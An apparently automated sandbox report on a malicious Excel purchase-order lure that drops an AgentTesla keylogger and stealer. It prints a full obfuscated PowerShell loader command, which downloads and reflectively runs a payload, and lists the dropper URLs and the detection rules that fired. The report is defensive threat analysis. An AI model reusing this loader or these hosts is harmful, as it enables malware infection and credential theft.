                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: wscript.exe, 00000006.00000003.477174452.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.477774934.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/nwtk
                      Source: wscript.exe, 00000006.00000003.477174452.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.000000000051A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.477774934.000000000051A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/nwtkd
                      Source: wscript.exe, 00000006.00000003.475867877.00000000030F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/nwtkd(M
                      Source: powershell.exe, 00000007.00000002.575765381.000000000251A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.520640546.0000000002451000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.000000000241C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.623977936.0000000002381000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: EQNEDT32.EXE, 00000003.00000002.470732712.000000000032F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs
                      Source: EQNEDT32.EXE, 00000003.00000002.470732712.00000000003AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs024C:
                      Source: EQNEDT32.EXE, 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbsj
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: powershell.exe, 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000009.00000002.520640546.000000000258A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
                      Source: powershell.exe, 00000009.00000002.520567838.0000000001F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6
                      Source: powershell.exe, 00000009.00000002.520640546.000000000258A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004E49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
                      Source: powershell.exe, 00000009.00000002.520640546.00000000026C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                      Source: powershell.exe, 00000009.00000002.520640546.00000000026C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                      Source: powershell.exe, 00000009.00000002.520640546.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/nwtkdE6
                      Source: wscript.exe, 00000006.00000003.476800668.0000000000529000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476902673.000000000052D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000002.478430362.000000000052E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.525769987.0000000004EA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: wscript.exe, 00000006.00000003.476434080.0000000000527000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, xljC6U.cs.Net Code: YPw7g

                      System Summary

                      barindex
                      Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                      Source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 3708, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\ProgIDJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgIDJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00285B409_2_00285B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002DB8F810_2_002DB8F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D492010_2_002D4920
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D390810_2_002D3908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002DECC810_2_002DECC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D7E2810_2_002D7E28
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D868010_2_002D8680
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002DB0C310_2_002DB0C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D3C4510_2_002D3C45
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D3C5010_2_002D3C50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002D873810_2_002D8738
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_002DDFB110_2_002DDFB1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00630CC810_2_00630CC8
                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2314
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2314Jump to behavior
                      Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                      Source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 9.2.powershell.exe.74eab28.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: Process Memory Space: powershell.exe PID: 3708, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, 9O2OLI.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, hdYUG.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, LGBZ4N2f.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, F8OmG.csCryptographic APIs: 'CreateDecryptor'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, Bgo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, k7FmsUgnvL.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 9.2.powershell.exe.74eab28.1.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@8/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Orden de Compra No. 78986756565344657.xlam.xlsxJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: NULL
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8B5D.tmpJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P.....................T........S.........................s............(.%.............@.%.............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P.....................T........S.........................s............(.%.............H...............Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
